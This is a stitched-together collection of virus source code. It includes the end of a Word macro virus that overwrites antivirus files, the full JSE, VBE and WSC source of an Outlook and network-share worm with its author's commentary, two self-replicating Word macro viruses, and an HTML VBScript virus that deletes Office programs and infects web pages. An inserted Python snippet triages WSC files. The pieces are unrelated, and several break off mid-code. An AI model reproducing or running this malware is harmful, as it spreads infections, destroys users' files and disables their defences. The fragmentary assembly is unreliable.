SetAttr "C:\program files\mcafee\*.dat", vbReadOnly
Open "C:\program files\mcafee\*.def" For Output As #5
Print #5, "NoBodyHears"
Close #5
SetAttr "C:\f-marco\*.def", vbReadOnly
Open "C:\f-macro\*.def" For Output As #6
Print #6, "NoBodyHears"
Close #6
End If
If Day(Now()) = Int(Rnd * 31) + 1 Then
With Assistant.NewBalloon
.Icon = msoIconTip
.Animation = msoAnimationGetArtsy
.Heading = "WM97 NoBodyHears"
.Text = "Welcome to WM97 NoBodyHears by Angelskitten / [NuKE]"
.Show
End With
ActiveDocument.Password = "NoBodyHears"
Shell "start http://www.avp.com.au/", vbHide
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
SetAttr ("c:\VXD.dll"), vbHidden + vbSystem
End Sub
Sub AutoOpen()
Call AutoClose
End Sub
Sub AutoNew()
Call AutoClose
End Sub
Sub ViewVBCode()
MsgBox "Unexcpected error", 16
Call AutoClose
End Sub
Sub ViewCode()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
Sub ToolsMacro()
MsgBox "Unexcpected error", 16
Call AutoClose
End Sub
Sub FileTemplates()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
Sub HelpWordPerfectHelp()
MsgBox "Unexcpected error", 16
Application.Caption = "Word 6.0"
Call AutoClose
End Sub
' Worm Name: NETWORK/OUTLOOK.FakeHoax
' Author: Zulu
' Origin: Argentina

' Encoded JScript/VBScript worm, first in a JSE or VBE file. It uses OUTLOOK and the network
' shares.
' The main code is a COM object written in XML and VBScript using Windows Script Component, so
' the code in the JSE and VBE file is trivial. Both versions create a WSC file (the COM object
' defined in XML) and then both call methods and change properties of that object; no real
' spreading code is in those files.
' The worm was written in this way to make it easier to port it to any other language; this way
' I was able to create a JSE and a VBE file without really porting the main code. Also, it's
' possible to create new versions using Delphi, Visual C++, or any other by using "REGSVR32.EXE"
' to register the WSC file as a COM object before calling its methods or changing its
' properties.
' This worm was written to show how JSE and VBE files could be used in viruses/worms, since
' before this they were only used as auxiliary files (some versions of HTML.rahC by 1nternal and
' OUTLOOK.Monopoly by me for example). Besides, since it needs Windows Script Host 2.0 or later,
' it won't be good at spreading itself at the time of writing this.
' Also, this was a good opportunity for using Windows Script Component for the first time, because
' it made it possible to write a JScript and a VBScript version without needing to port the whole
' code, so this is also the first virus/worm using its own COM object.
'
' Features:
'
' - OUTLOOK spreading. It will use OUTLOOK to send itself to all contacts in the address book if
' the number of addresses is less than 101. If that number is more than 100 it will try to
' select 100 random addresses. Subject and body are always the same.
' - Network spreading. It will copy itself to the root of all shares (not only mapped drives),
' waiting for someone to run it.
' - The worm file ("WOBBLER.TXT.JSE" or "WOBBLER.TXT.VBE" depending on the version) will show a
' TXT file when run, so it will show what many users expect.
' This TXT file will show the Wobbler hoax (the reason for the worm's name), which is a strange
' social engineering method for a real worm. Anyway, since this won't spread well because of
' other reasons, even if someone wants to spread it, I won't know if the hoax message is good
' for this purpose. Message subject and body talk about important information in the TXT file,
' but they don't talk about the hoax because this could make the user afraid of opening the
' file or maybe make the user remember about viruses and check for double extensions.
' - It has a 1/5 probability of also sending another email to the same addresses as the email
' having the worm file. The body of this email will have a poem written in Spanish.
' The reason for this is an unusual request from a friend: she wanted one of her poems to be
' included in a virus/worm.
' So, even if this means unnecessary bytes and even worse spreading capabilities, here it is. :)
' - There is no need for AV products or removers after running the worm since Windows' settings are
' not changed and all temporary files are deleted.
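As a defender-side complement to the description above, here is an added Python example (not the author's code) that parses a Windows Script Component file the way an analyst would triage one: it lists the public properties and methods, the CreateObject ProgIDs used in the script block, and flags the address-book and share-enumeration combinations this header describes. SAMPLE_WSC and the indicator names are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Constructed sample component, not the one from the listing: a skeleton with
# the kind of public interface and COM calls the header describes.
SAMPLE_WSC = """<?XML version="1.0"?>
<component>
 <public>
  <property name="WormFile"/>
  <method name="Spread"><parameter name="Subject"/></method>
 </public>
 <script language="VBScript">
 <![CDATA[
 Sub Spread(Subject)
   Set FSO = CreateObject("Scripting.FileSystemObject")
   Set Net = CreateObject("WScript.Network")
   Set Shares = Net.EnumNetworkDrives
   FSO.CopyFile WormFile, Shares.Item(0)
   Set Outlook = CreateObject("Outlook.Application")
   Set MAPI = Outlook.GetNameSpace("MAPI")
   For Each List In MAPI.AddressLists
   Next
 End Sub
 ]]>
 </script>
</component>
"""

# Every pattern in a list must match the script text for the indicator to fire.
INDICATORS: Dict[str, List[str]] = {
    "outlook-addressbook": [r"Outlook\.Application", r"AddressLists|AddressEntries"],
    "mass-mail":           [r"Outlook\.Application", r"\.Send\b"],
    "share-enumeration":   [r"WScript\.Network", r"EnumNetworkDrives"],
    "file-drop":           [r"Scripting\.FileSystemObject", r"CreateTextFile|CopyFile"],
}

# The listing's component opens with "<?XML ...?>"; a strict XML parser may
# reject the upper-case target, so the declaration is removed before parsing.
XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>", re.IGNORECASE)


def analyze_wsc(text: str) -> dict:
    """Summarise a single-component .WSC file: interface, ProgIDs, indicators."""
    root = ET.fromstring(XML_DECL.sub("", text, count=1))
    if root.tag != "component":
        raise ValueError("not a single-component WSC file")
    public = root.find("public")
    props = [p.get("name") for p in public.findall("property")] if public is not None else []
    methods = ({m.get("name"): [a.get("name") for a in m.findall("parameter")]
                for m in public.findall("method")} if public is not None else {})
    scripts = root.findall("script")
    languages = sorted({s.get("language", "") for s in scripts})
    code = "\n".join(s.text or "" for s in scripts)   # CDATA arrives as .text
    progids = sorted(set(re.findall(r'CreateObject\(\s*"([^"]+)"', code)))
    hits = [name for name, pats in INDICATORS.items()
            if all(re.search(p, code, re.IGNORECASE) for p in pats)]
    return {"languages": languages, "properties": props, "methods": methods,
            "progids": progids, "indicators": hits}


if __name__ == "__main__":
    for key, value in analyze_wsc(SAMPLE_WSC).items():
        print(f"{key}: {value}")
```

The loader side of the pattern is the `GetObject("script:<path>")` call in the JSE, so a temp-folder .WSC referenced that way deserves the same look.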
'
' Here is the JSE file without encoding:

G=new ActiveXObject("Scripting.FileSystemObject");
A=G.GetTempName().concat(".WSC");
S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder(2),A),true);
S.Write("<?XML version=\"1.0\"?>\r\n<component>\r\n <comment>\r\n
NETWORK/OUTLOOK.FakeHoax\r\n </comment>\r\n <public>\r\n <property name=\"AttachmentFile
\"/>\r\n <property name=\"TextFile\"/>\r\n <property name=\"WormFile\"/>\r\n
<method name=\"DelTempFiles\"/>\r\n <method name=\"NetworkSpreading\">\r\n
<parameter name=\"FileName\"/>\r\n </method>\r\n <method name=\"OutlookSpreading\
">\r\n <parameter name=\"Body\"/>\r\n <parameter name=\"MaxAmount\"/>\r\n
<parameter name=\"Subject\"/>\r\n </method>\r\n <method name=\"ShowText\">\r\n
<parameter name=\"Content\"/>\r\n </method>\r\n </public>\r\n <script language=\"
VBScript\">\r\n <![CDATA[\r\n Sub DelTempFiles\r\n On Error Resume Next\r\n
Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n If
FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, True\r\n If
FSO.FileExists(TextFile) Then FSO.DeleteFile TextFile, True\r\n Set FSO =
Nothing\r\n End Sub\r\n Sub NetworkSpreading(FileName)\r\n On Error Resume
Next\r\n Set Network = CreateObject(\"WScript.Network\")\r\n Set Shares =
Network.EnumNetworkDrives\r\n If Shares.Count > 0 Then\r\n Set FSO =
CreateObject(\"Scripting.FileSystemObject\")\r\n For Counter1 = 0 To Shares.Count -
1\r\n If Shares.Item(Counter1) <> \"\" Then FSO.CopyFile WormFile,
FSO.BuildPath(Shares.Item(Counter1), FileName)\r\n Next\r\n Set FSO =
Nothing\r\n End If\r\n Set Shares = Nothing\r\n Set Network = Nothing\r\n
End Sub\r\n Sub OutlookSpreading(MaxAmount, Subject, Body)\r\n On Error Resume
Next\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n FSO.CopyFile
WormFile, AttachmentFile\r\n Set FSO = Nothing\r\n Outlook = \"\"\r\n Set
Outlook = CreateObject(\"Outlook.Application\")\r\n If Outlook <> \"\" Then\r\n
Set MAPI = Outlook.GetNameSpace(\"MAPI\")\r\n For Each List In
MAPI.AddressLists\r\n If List.AddressEntries.Count > 0 Then\r\n Set
Email1 = Outlook.CreateItem(0)\r\n If List.AddressEntries.Count > MaxAmount
Then\r\n Dim Address()\r\n ReDim Address(MaxAmount -
1)\r\n For Counter1 = 0 To MaxAmount - 1\r\n Address(Counter1) =
Int(List.AddressEntries.Count * Rnd)\r\n Next\r\n For Counter1 = 0
To MaxAmount - 1\r\n For Counter2 = Counter1 + 1 To MaxAmount -
1\r\n If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1
Then Address(Counter2) = -1\r\n Next\r\n Next\r\n
For Counter1 = 0 To MaxAmount - 1\r\n If Address(Counter1) = -1 Then
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)\r\n
Next\r\n For Counter1 = 0 To MaxAmount - 1\r\n For Counter2 =
Counter1 + 1 To MaxAmount - 1\r\n If Address(Counter1) = Address(Counter2)
And Address(Counter1) <> -1 Then Address(Counter2) = -1\r\n
Next\r\n Next\r\n For Counter1 = 0 To MaxAmount -
1\r\n If Address(Counter1) <> -1 Then\r\n Set Entry =
List.AddressEntries(Address(Counter1))\r\n If Counter1 = 0 Then Addresses =
Entry.Address Else Addresses = Addresses & \"; \" & Entry.Address\r\n Set
Entry = Nothing\r\n End If\r\n Next\r\n
Else\r\n For Counter1 = 1 To List.AddressEntries.Count\r\n Set
Entry = List.AddressEntries(Counter1)\r\n If Counter1 = 1 Then Addresses =
Entry.Address Else Addresses = Addresses & \"; \" & Entry.Address\r\n Set
Entry = Nothing\r\n Next\r\n End If\r\n Email1.BCC =
Addresses\r\n Email1.Subject = Subject\r\n Email1.Body =
Body\r\n Email1.Attachments.Add AttachmentFile\r\n
Email1.DeleteAfterSubmit = True\r\n Email1.Send\r\n Set Email1 =
Nothing\r\n Randomize\r\n If Int(5 * Rnd) = 0 Then\r\n
Set Email2 = Outlook.CreateItem(0)\r\n Email2.BCC = Addresses\r\n
Email2.Subject = \"Alma\"\r\n Email2.Body = \"No alucines que te amo,\" &
Chr(13) & Chr(10) & \"cuando en realidad es solo\" & Chr(13) & Chr(10) & \"mi coraz\" &
Chr(243) & \"n qui\" & Chr(233) & \"n lo hace.\" & Chr(13) & Chr(10) & \"Porque como ya sabr\
" & Chr(225) & \"s,\" & Chr(13) & Chr(10) & \"mi coraz\" & Chr(243) & \"n no manda en mi vida
,\" & Chr(13) & Chr(10) & \"si as\" & Chr(237) & \" lo hiciera,\" & Chr(13) & Chr(10) & \"mi
alma estar\" & Chr(237) & \"a perdida.\"\r\n Email2.DeleteAfterSubmit =
True\r\n Email2.Send\r\n Set Email2 = Nothing\r\n End
If\r\n End If\r\n Next\r\n Set MAPI = Nothing\r\n Set Outlook
= Nothing\r\n End If\r\n End Sub\r\n Sub ShowText(Content)\r\n On Error
Resume Next\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n Set
File = FSO.CreateTextFile(TextFile, True)\r\n File.Write(Content)\r\n
File.Close\r\n Set File = Nothing\r\n Set FSO = Nothing\r\n Set WSHShell =
CreateObject(\"WScript.Shell\")\r\n WSHShell.Run(TextFile)\r\n Set WSHShell =
Nothing\r\n End Sub\r\n ]]>\r\n </script>\r\n</component>\r\n")
S.Close();
F=GetObject("script:".concat(G.BuildPath(G.GetSpecialFolder(2),A)));
F.AttachmentFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT.JSE");
F.TextFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT");
F.WormFile=WScript.ScriptFullName;
F.ShowText("Thought you might be interested in this message. If you receive an\r\nemail with
a file called \"California\" do not open the file. The file\r\ncontains the \"WOBBLER\"
virus.\r\n\r\nThis information was announced yesterday morning by IBM. The statement\r\nsays
that ... \"This is a very dangerous virus, much worse than\r\n'Melissa' and there is NO
remedy for it at this time. Some very sick\r\nindividual has succeeded in using the reformat
function from Norton\r\nUtilities causing it to completely erase all documents on the
hard\r\ndrive. It has been designed to work with Netscape Navigator and\r\nMicrosoft
Internet Explorer. It destroys Macintosh and IBM compatible\r\ncomputers. This is a new,
very malicious virus and not many people\r\nknow about it at this time.\"\r\n\"Please pass
this warning file to everyone in your address book and\r\nshare it with all your online
friends ASAP so that the destruction it\r\ncan cause may be minimized.\"\r\n");
F.OutlookSpreading(100,"Fw: important","> Thought you might be interested in this message,
read the attachment for more information.");
F.NetworkSpreading("WOBBLER.TXT.JSE");
F.DelTempFiles();
G.DeleteFile(G.BuildPath(G.GetSpecialFolder(2),A),true);

' Here is the VBE file without encoding:

Set G=CreateObject("Scripting.FileSystemObject")
A=G.GetTempName&".WSC"
Set S=G.CreateTextFile(G.BuildPath(G.GetSpecialFolder(2),A),True)
O=Chr(13)&Chr(10)
S.Write "<?XML version=""1.0""?>"&O&"<component>"&O&" <comment>"&O&"
NETWORK/OUTLOOK.FakeHoax"&O&" </comment>"&O&" <public>"&O&" <property
name=""AttachmentFile""/>"&O&" <property name=""TextFile""/>"&O&" <property
name=""WormFile""/>"&O&" <method name=""DelTempFiles""/>"&O&" <method
name=""NetworkSpreading"">"&O&" <parameter name=""FileName""/>"&O&" </method>"&O&
" <method name=""OutlookSpreading"">"&O&" <parameter name=""Body""/>"&O&"
<parameter name=""MaxAmount""/>"&O&" <parameter name=""Subject""/>"&O&" </method>"&O&
" <method name=""ShowText"">"&O&" <parameter name=""Content""/>"&O&" </method>"&O&
" </public>"&O&" <script language=""VBScript"">"&O&" <![CDATA["&O&" Sub DelTempFiles"
&O&" On Error Resume Next"&O&" Set FSO =
CreateObject(""Scripting.FileSystemObject"")"&O&" If FSO.FileExists(AttachmentFile)
Then FSO.DeleteFile AttachmentFile, True"&O&" If FSO.FileExists(TextFile) Then
FSO.DeleteFile TextFile, True"&O&" Set FSO = Nothing"&O&" End Sub"&O&" Sub
NetworkSpreading(FileName)"&O&" On Error Resume Next"&O&" Set Network =
CreateObject(""WScript.Network"")"&O&" Set Shares = Network.EnumNetworkDrives"&O&"
If Shares.Count > 0 Then"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")"
&O&" For Counter1 = 0 To Shares.Count - 1"&O&" If Shares.Item(Counter1) <>
"""" Then FSO.CopyFile WormFile, FSO.BuildPath(Shares.Item(Counter1), FileName)"&O&"
Next"&O&" Set FSO = Nothing"&O&" End If"&O&" Set Shares = Nothing"&O&"
Set Network = Nothing"&O&" End Sub"&O&" Sub OutlookSpreading(MaxAmount, Subject, Body)"
&O&" On Error Resume Next"&O&" Set FSO =
CreateObject(""Scripting.FileSystemObject"")"&O&" FSO.CopyFile WormFile, AttachmentFile"
&O&" Set FSO = Nothing"&O&" Outlook = """""&O&" Set Outlook =
CreateObject(""Outlook.Application"")"&O&" If Outlook <> """" Then"&O&" Set MAPI
= Outlook.GetNameSpace(""MAPI"")"&O&" For Each List In MAPI.AddressLists"&O&
" If List.AddressEntries.Count > 0 Then"&O&" Set Email1 =
Outlook.CreateItem(0)"&O&" If List.AddressEntries.Count > MaxAmount Then"&O&
" Dim Address()"&O&" ReDim Address(MaxAmount - 1)"&O&
" For Counter1 = 0 To MaxAmount - 1"&O&" Address(Counter1) =
Int(List.AddressEntries.Count * Rnd)"&O&" Next"&O&" For Counter1 =
0 To MaxAmount - 1"&O&" For Counter2 = Counter1 + 1 To MaxAmount - 1"&O&
" If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then
Address(Counter2) = -1"&O&" Next"&O&" Next"&O&" For
Counter1 = 0 To MaxAmount - 1"&O&" If Address(Counter1) = -1 Then
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)"&O&" Next"&O&
" For Counter1 = 0 To MaxAmount - 1"&O&" For Counter2 = Counter1
+ 1 To MaxAmount - 1"&O&" If Address(Counter1) = Address(Counter2) And
Address(Counter1) <> -1 Then Address(Counter2) = -1"&O&" Next"&O&
" Next"&O&" For Counter1 = 0 To MaxAmount - 1"&O&"
If Address(Counter1) <> -1 Then"&O&" Set Entry =
List.AddressEntries(Address(Counter1))"&O&" If Counter1 = 0 Then Addresses
= Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address"&O&"
Set Entry = Nothing"&O&" End If"&O&" Next"&O&" Else"&O
&" For Counter1 = 1 To List.AddressEntries.Count"&O&" Set Entry
= List.AddressEntries(Counter1)"&O&" If Counter1 = 1 Then Addresses =
Entry.Address Else Addresses = Addresses & ""; "" & Entry.Address"&O&" Set
Entry = Nothing"&O&" Next"&O&" End If"&O&" Email1.BCC =
Addresses"&O&" Email1.Subject = Subject"&O&" Email1.Body = Body"&O&
" Email1.Attachments.Add AttachmentFile"&O&" Email1.DeleteAfterSubmit
= True"&O&" Email1.Send"&O&" Set Email1 = Nothing"&O&"
Randomize"&O&" If Int(5 * Rnd) = 0 Then"&O&" Set Email2 =
Outlook.CreateItem(0)"&O&" Email2.BCC = Addresses"&O&"
Email2.Subject = ""Alma"""&O&" Email2.Body = ""No alucines que te amo,"" &
Chr(13) & Chr(10) & ""cuando en realidad es solo"" & Chr(13) & Chr(10) & ""mi coraz"" &
Chr(243) & ""n qui"" & Chr(233) & ""n lo hace."" & Chr(13) & Chr(10) & ""Porque como ya
sabr"" & Chr(225) & ""s,"" & Chr(13) & Chr(10) & ""mi coraz"" & Chr(243) & ""n no manda en
mi vida,"" & Chr(13) & Chr(10) & ""si as"" & Chr(237) & "" lo hiciera,"" & Chr(13) & Chr(10)
& ""mi alma estar"" & Chr(237) & ""a perdida."""&O&" Email2.DeleteAfterSubmit =
True"&O&" Email2.Send"&O&" Set Email2 = Nothing"&O&"
End If"&O&" End If"&O&" Next"&O&" Set MAPI = Nothing"&O&" Set
Outlook = Nothing"&O&" End If"&O&" End Sub"&O&" Sub ShowText(Content)"&O&"
On Error Resume Next"&O&" Set FSO = CreateObject(""Scripting.FileSystemObject"")"&O&
" Set File = FSO.CreateTextFile(TextFile, True)"&O&" File.Write(Content)"&O&"
File.Close"&O&" Set File = Nothing"&O&" Set FSO = Nothing"&O&" Set WSHShell =
CreateObject(""WScript.Shell"")"&O&" WSHShell.Run(TextFile)"&O&" Set WSHShell =
Nothing"&O&" End Sub"&O&" ]]>"&O&" </script>"&O&"</component>"&O
S.Close
Set F=GetObject("script:"&G.BuildPath(G.GetSpecialFolder(2),A))
F.AttachmentFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT.VBE")
F.TextFile=G.BuildPath(G.GetSpecialFolder(2),"WOBBLER.TXT")
F.WormFile=WScript.ScriptFullName
F.ShowText "Thought you might be interested in this message. If you receive an"&O&"email
with a file called ""California"" do not open the file. The file"&O&"contains the
""WOBBLER"" virus."&O&O&"This information was announced yesterday morning by IBM. The
statement"&O&"says that ... ""This is a very dangerous virus, much worse than"&O&"'Melissa'
and there is NO remedy for it at this time. Some very sick"&O&"individual has succeeded in
using the reformat function from Norton"&O&"Utilities causing it to completely erase all
documents on the hard"&O&"drive. It has been designed to work with Netscape Navigator and"&O&
"Microsoft Internet Explorer. It destroys Macintosh and IBM compatible"&O&"computers. This
is a new, very malicious virus and not many people"&O&"know about it at this time."""&O&
"""Please pass this warning file to everyone in your address book and"&O&"share it with all
your online friends ASAP so that the destruction it"&O&"can cause may be minimized."""&O
F.OutlookSpreading 100,"Fw: important","> Thought you might be interested in this message,
read the attachment for more information."
F.NetworkSpreading "WOBBLER.TXT.VBE"
F.DelTempFiles
G.DeleteFile G.BuildPath(G.GetSpecialFolder(2),A),True

' Here is the WSC file (the COM object); I used spaces and "normal" variable names to make it
' easier to read:

<?XML version="1.0"?>
<component>
<comment>
NETWORK/OUTLOOK.FakeHoax
</comment>
<public>
<property name="AttachmentFile"/>
<property name="TextFile"/>
<property name="WormFile"/>
<method name="DelTempFiles"/>
<method name="NetworkSpreading">
<parameter name="FileName"/>
</method>
<method name="OutlookSpreading">
<parameter name="Body"/>
<parameter name="MaxAmount"/>
<parameter name="Subject"/>
</method>
<method name="ShowText">
<parameter name="Content"/>
</method>
</public>
<script language="VBScript">
<![CDATA[
Sub DelTempFiles
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
If FSO.FileExists(AttachmentFile) Then FSO.DeleteFile AttachmentFile, True
If FSO.FileExists(TextFile) Then FSO.DeleteFile TextFile, True
Set FSO = Nothing
End Sub
Sub NetworkSpreading(FileName)
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set FSO = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then FSO.CopyFile WormFile, FSO.BuildPath(Shares.Item(Counter1), FileName)
Next
Set FSO = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub
Sub OutlookSpreading(MaxAmount, Subject, Body)
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
FSO.CopyFile WormFile, AttachmentFile
Set FSO = Nothing
Outlook = ""
Set Outlook = CreateObject("Outlook.Application")
If Outlook <> "" Then
Set MAPI = Outlook.GetNameSpace("MAPI")
For Each List In MAPI.AddressLists
If List.AddressEntries.Count > 0 Then
Set Email1 = Outlook.CreateItem(0)
If List.AddressEntries.Count > MaxAmount Then
Dim Address()
ReDim Address(MaxAmount - 1)
For Counter1 = 0 To MaxAmount - 1
Address(Counter1) = Int(List.AddressEntries.Count * Rnd)
Next
For Counter1 = 0 To MaxAmount - 1
For Counter2 = Counter1 + 1 To MaxAmount - 1
If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then Address(Counter2) = -1
Next
Next
For Counter1 = 0 To MaxAmount - 1
If Address(Counter1) = -1 Then Address(Counter1) = Int(List.AddressEntries.Count * Rnd)
Next
For Counter1 = 0 To MaxAmount - 1
For Counter2 = Counter1 + 1 To MaxAmount - 1
If Address(Counter1) = Address(Counter2) And Address(Counter1) <> -1 Then Address(Counter2) = -1
Next
Next
For Counter1 = 0 To MaxAmount - 1
If Address(Counter1) <> -1 Then
Set Entry = List.AddressEntries(Address(Counter1))
If Counter1 = 0 Then Addresses = Entry.Address Else Addresses = Addresses & "; " & Entry.Address
Set Entry = Nothing
End If
Next
Else
For Counter1 = 1 To List.AddressEntries.Count
Set Entry = List.AddressEntries(Counter1)
If Counter1 = 1 Then Addresses = Entry.Address Else Addresses = Addresses & "; " & Entry.Address
Set Entry = Nothing
Next
End If
Email1.BCC = Addresses
Email1.Subject = Subject
Email1.Body = Body
Email1.Attachments.Add AttachmentFile
Email1.DeleteAfterSubmit = True
Email1.Send
Set Email1 = Nothing
Randomize
If Int(5 * Rnd) = 0 Then
Set Email2 = Outlook.CreateItem(0)
Email2.BCC = Addresses
Email2.Subject = "Alma"
Email2.Body = "No alucines que te amo," & Chr(13) & Chr(10) & "cuando en realidad es solo" & Chr(13) & Chr(10) & "mi coraz" & Chr(243) & "n qui" & Chr(233) & "n lo hace." & Chr(13) & Chr(10) & "Porque como ya sabr" & Chr(225) & "s," & Chr(13) & Chr(10) & "mi coraz" & Chr(243) & "n no manda en mi vida," & Chr(13) & Chr(10) & "si as" & Chr(237) & " lo hiciera," & Chr(13) & Chr(10) & "mi alma estar" & Chr(237) & "a perdida."
Email2.DeleteAfterSubmit = True
Email2.Send
Set Email2 = Nothing
End If
End If
Next
Set MAPI = Nothing
Set Outlook = Nothing
End If
End Sub
Sub ShowText(Content)
On Error Resume Next
Set FSO = CreateObject("Scripting.FileSystemObject")
Set File = FSO.CreateTextFile(TextFile, True)
File.Write(Content)
File.Close
Set File = Nothing
Set FSO = Nothing
Set WSHShell = CreateObject("WScript.Shell")
WSHShell.Run(TextFile)
Set WSHShell = Nothing
End Sub
]]>
</script>
</component>
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Function IT()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Set A = VBE.SelectedVBComponent.CodeModule
B = A.Lines(A.ProcStartLine("IT", vbext_pk_Proc), A.ProcCountLines("IT", vbext_pk_Proc))
For c = 1 To VBE.VBProjects.Count
For D = 1 To VBE.VBProjects(c).VBComponents.Count
Set E = VBE.VBProjects(c).VBComponents(D).CodeModule
If E.ProcOfLine(E.ProcStartLine("IT", vbext_pk_Proc), 1) <> "IT" And E.CountOfLines > 2 Then
E.AddFromString B
For F = 1 To E.CountOfLines
G = E.ProcOfLine(F, 1)
If H <> G And G <> "IT" And Right(E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1), 4) <> ": IT" Then
E.ReplaceLine E.ProcStartLine(G, vbext_pk_Proc), E.Lines(E.ProcStartLine(G, vbext_pk_Proc), 1) & ": IT"
H = G
End If
Next
Next
Next
End Function
Private Sub Document_Open(): IT
'My_Creator = Lys Kovick
'My_Name = Neclovek
'My_Comments = Do Not Distribute!
End Sub
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
END
Attribute VB_Name = "ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Private Function IT()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Set A = VBE.SelectedVBComponent.CodeModule
B = A.Lines(A.ProcStartLine("IT", vbext_pk_Proc), A.ProcCountLines("IT", vbext_pk_Proc))
For c = 1 To VBE.VBProjects.Count
For D = 1 To VBE.VBProjects(c).VBComponents.Count
Set E = VBE.VBProjects(c).VBComponents(D).CodeModule
F = ""
F = E.Lines(E.ProcStartLine("IT", vbext_pk_Proc), E.ProcCountLines("IT", vbext_pk_Proc))
If E.CountOfLines > 2 And F <> B Then E.AddFromString B
For G = 1 To E.CountOfLines
H = E.ProcOfLine(G, 1)
If I <> H And H <> "IT" And Right(E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1), 4) <> ": IT" Then
E.ReplaceLine E.ProcStartLine(H, vbext_pk_Proc), E.Lines(E.ProcStartLine(H, vbext_pk_Proc), 1) & ": IT"
I = H
End If
Next
Next
Next
End Function
Private Sub Document_Open(): IT
'My_Creator = Lys Kovick
'My_Name = Unperson
'My_Comments = Do Not Distribute!
End Sub
<SCRIPT LANGUAGE="VBScript">
<!--
Dim FSO,MSBound,DC,D,TMP,F
MSBound = "<SCRIPT LANGUAGE=#VBScript#>$<!--$ Dim FSO,MSBound,DC,D,TMP,F$ MSBound =
#|#$ On Error Resume Next$ TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound)$ TMP =
ReplaceWithIn(Chr(35),Chr(34),TMP)$ F = InStr(1,TMP,Chr(124))$ MSBound = Left(TMP,F-1) &
MSBound & Mid(TMP,F+1)$ F = InStr(2500,MSBound,Chr(124))$ MSBound = Left(MSBound,F-1) &
Mid(MSBound,F+1)$$ Set FSO = CreateObject(#Scripting.FileSystemObject#)$ If Err.Number = 0
Then$ Set DC = FSO.Drives$ For Each D In DC$ If D.DriveType = 2
Then$ SweepDrive D.DriveLetter & #:\#$ End If$ Next$ End If$$Sub
SweepDrive(pPath)$ Dim F, S, O$ On Error Resume Next$ Set F = FSO.GetFolder(pPath)$
InfectFiles F$ Set S = F.SubFolders$ For Each O In S$ SweepDrive(pPath & O.Name &
#\#)$ Next $End Sub $$Sub InfectFiles(pFolder)$ Dim F,Member,Ext,M,C$ On Error
Resume Next$ Set F = pFolder.Files$ For Each Member In F$ M =
UCase(Member.Name)$ If M = #WINWORD.EXE# Or M = #ACCESS.EXE# Or M = #EXCEL.EXE# Or M =
#WORD.EXE# Then$ Set M = FSO.GetFile(Member.Path)$ M.Attributes =
(M.Attributes And 1) - 1$ M.Delete$ End If $ Ext =
UCase(FSO.GetExtensionName(Member.Name))$ If Ext = #HTML# Or Ext = #HTM# Then$
Set M = FSO.OpenTextFile(Member.Path,1)$ C = M.ReadAll$ If
InStr(1,C,MSBound) = 0 Then$ Set M = FSO.CreateTextFile(Member.Path,
True)$ M.WriteLine MSBound & C$ M.Close$ End If$ End if$
Next$End Sub$$Private Function ReplaceWithIn(CurChar,NewChar,SourceString)$ Dim T,TMP$ T =
1$ TMP = SourceString$ Do While T > 0$ T = InStr(T, TMP, CurChar)$ If T > 0 Then
TMP = Left(TMP,T-1) & NewChar & Mid(TMP,T+1)$ Loop$ ReplaceWithIn = TMP$End
Function$$'MSBound by Suppa.$-->$<|/SCRIPT>$$"
On Error Resume Next
TMP = ReplaceWithIn(Chr(36),vbCrLf,MSBound)
TMP = ReplaceWithIn(Chr(35),Chr(34),TMP)
F = InStr(1,TMP,Chr(124))
MSBound = Left(TMP,F-1) & MSBound & Mid(TMP,F+1)
F = InStr(2500,MSBound,Chr(124))
MSBound = Left(MSBound,F-1) & Mid(MSBound,F+1)

Set FSO = CreateObject("Scripting.FileSystemObject")


If Err.Number = 0 Then
Set DC = FSO.Drives
For Each D In DC
If D.DriveType = 2 Then
SweepDrive D.DriveLetter & ":\"
End If
Next
End If

Sub SweepDrive(pPath)
Dim F, S, O
On Error Resume Next
Set F = FSO.GetFolder(pPath)
InfectFiles F
Set S = F.SubFolders
For Each O In S
SweepDrive(pPath & O.Name & "\")
Next
End Sub

Sub InfectFiles(pFolder)
Dim F,Member,Ext,M,C
On Error Resume Next
Set F = pFolder.Files
For Each Member In F
M = UCase(Member.Name)
If M = "WINWORD.EXE" Or M = "ACCESS.EXE" Or M = "EXCEL.EXE" Or M = "WORD.EXE" Then
